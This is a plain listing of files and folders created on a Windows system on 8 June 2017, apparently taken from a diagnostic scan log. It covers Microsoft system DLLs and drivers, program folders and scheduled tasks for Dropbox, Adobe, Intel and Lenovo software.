2017-06-08 09:54 - 2017-06-08 09:54 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00980992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00974848 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmgaserver.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00972800 _____ (Microsoft Corporation) C:\WINDOWS\system32\sysmain.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpsvc.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\autochk.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00961952 _____ (Microsoft Corporation) C:\WINDOWS\system32\efscore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00952832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00909824 _____ (Microsoft Corporation) C:\WINDOWS\system32\ISM.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00899584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.appcore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00892416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MessagingDataModel2.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autochk.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00866816 _____ (Microsoft Corporation) C:\WINDOWS\system32\NPSMDesktopProvider.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00846848 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00826368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NPSMDesktopProvider.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00809472 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthSSO.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00807424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00799232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00777400 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MessagingDataModel2.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00754080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00750080 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00741784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00731136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmgaserver.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00730016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00722944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00716440 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00712608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00708712 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00707072 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00673280 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00673112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppResolver.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00667040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00654976 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00651680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00647168 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00641536 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdbui.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00624640 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00616960 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowManagement.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00606960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00601088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.Launcher.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00599576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00586240 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00585216 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00559000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnprv.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00549888 _____ (Microsoft Corporation) C:\WINDOWS\system32\DictationManager.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00546208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2017-06-08 09:54 - 2017-06-08 09:54 - 00543648 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00524800 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00523296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppResolver.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00519680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00518144 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00507392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00491520 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Display.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00476672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00476160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00457728 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00450048 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00444928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.Launcher.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00439808 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Midi.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2017-06-08 09:54 - 2017-06-08 09:54 - 00427008 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00411040 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00409600 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00409504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00408064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00406064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MMDevAPI.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00394240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DictationManager.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00392704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00388000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2017-06-08 09:54 - 2017-06-08 09:54 - 00387928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00370928 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00368128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00364032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00363424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fastfat.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00362496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00361472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConhostV2.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00354400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MMDevAPI.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00354360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputSwitch.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00349600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsDocumentTargetPrint.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00335808 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00334336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00332800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Midi.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationObjFactory.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00299520 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00287648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00282112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00277504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xboxgip.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00255904 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsDocumentTargetPrint.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00251904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Preview.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00233472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Diagnostics.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.ps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00211872 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreenps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.AppDefaults.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00199680 _____ (Microsoft Corporation) C:\WINDOWS\system32\RstrtMgr.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00192512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.SharedPC.AccountManager.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00188824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00181664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00174080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Diagnostics.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00174080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RstrtMgr.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseModernAppMgmtCSP.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00159744 _____ (Microsoft Corporation) C:\WINDOWS\system32\NPSM.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00149504 _____ (Microsoft Corporation) C:\WINDOWS\system32\embeddedmodesvc.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00148480 _____ (Microsoft Corporation) C:\WINDOWS\system32\umpo.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00144288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00142240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\smartscreenps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00133120 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblGameSaveExt.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NPSM.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netvsc.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00112544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dam.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00105456 _____ (Microsoft Corporation) C:\WINDOWS\system32\imagehlp.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00095584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imagehlp.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmjpegdec.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrvext.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00086016 _____ C:\WINDOWS\system32\xboxgipsynthetic.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00082944 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2017-06-08 09:54 - 2017-06-08 09:54 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmjpegdec.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00078336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00072192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2017-06-08 09:54 - 2017-06-08 09:54 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\vss_ps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00059904 _____ C:\WINDOWS\SysWOW64\xboxgipsynthetic.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offreg.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\catsrvps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00032004 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin
2017-06-08 09:54 - 2017-06-08 09:54 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksthunk.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00027040 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser_broker.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\snmptrap.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rootmdm.sys
2017-06-08 09:51 - 2017-06-08 09:51 - 00008192 _____ C:\WINDOWS\system32\config\userdiff
2017-06-08 09:51 - 2017-06-08 08:58 - 00000000 ____D C:\WINDOWS\ServiceProfiles
2017-06-08 09:48 - 2017-06-08 09:48 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\WINDOWS\SysWOW64\XPSViewer
2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\WINDOWS\SysWOW64\BestPractices
2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\WINDOWS\system32\msmq
2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\WINDOWS\system32\BestPractices
2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\Program Files\Reference Assemblies
2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\Program Files\MSBuild
2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\Program Files (x86)\MSBuild
2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\inetpub
2017-06-08 09:48 - 2017-02-10 12:26 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2017-06-08 09:48 - 2017-02-10 12:26 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2017-06-08 09:48 - 2017-02-10 12:26 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2017-06-08 09:48 - 2017-02-10 12:21 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2017-06-08 09:48 - 2017-02-10 12:21 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2017-06-08 09:48 - 2017-02-10 12:21 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2017-06-08 09:17 - 2017-06-08 09:17 - 00000000 ____D C:\ProgramData\USOShared
2017-06-08 09:09 - 2017-06-08 09:09 - 00011433 _____ C:\WINDOWS\diagwrn.xml
2017-06-08 09:09 - 2017-06-08 09:09 - 00011433 _____ C:\WINDOWS\diagerr.xml
2017-06-08 09:08 - 2017-07-04 09:44 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-06-08 09:08 - 2017-06-08 09:08 - 00003760 _____ C:\WINDOWS\System32\Tasks\DropboxUpdateTaskMachineUA
2017-06-08 09:08 - 2017-06-08 09:08 - 00003536 _____ C:\WINDOWS\System32\Tasks\DropboxUpdateTaskMachineCore
2017-06-08 09:08 - 2017-06-08 09:08 - 00003482 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task
2017-06-08 09:08 - 2017-06-08 09:08 - 00003404 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player PPAPI Notifier
2017-06-08 09:08 - 2017-06-08 09:08 - 00003118 _____ C:\WINDOWS\System32\Tasks\Intel PTT EK Recertification
2017-06-08 09:08 - 2017-06-08 09:08 - 00002340 _____ C:\WINDOWS\System32\Tasks\{D47AB256-778C-4756-BFF4-B5F38C8A441A}
2017-06-08 09:08 - 2017-06-08 09:08 - 00002336 _____ C:\WINDOWS\System32\Tasks\RtHDVBg_LENOVO_MICPKEY
2017-06-08 09:08 - 2017-06-08 09:08 - 00002336 _____ C:\WINDOWS\System32\Tasks\{C33EC7F1-7E6C-4635-A9D8-DE9B48C4F5F2}
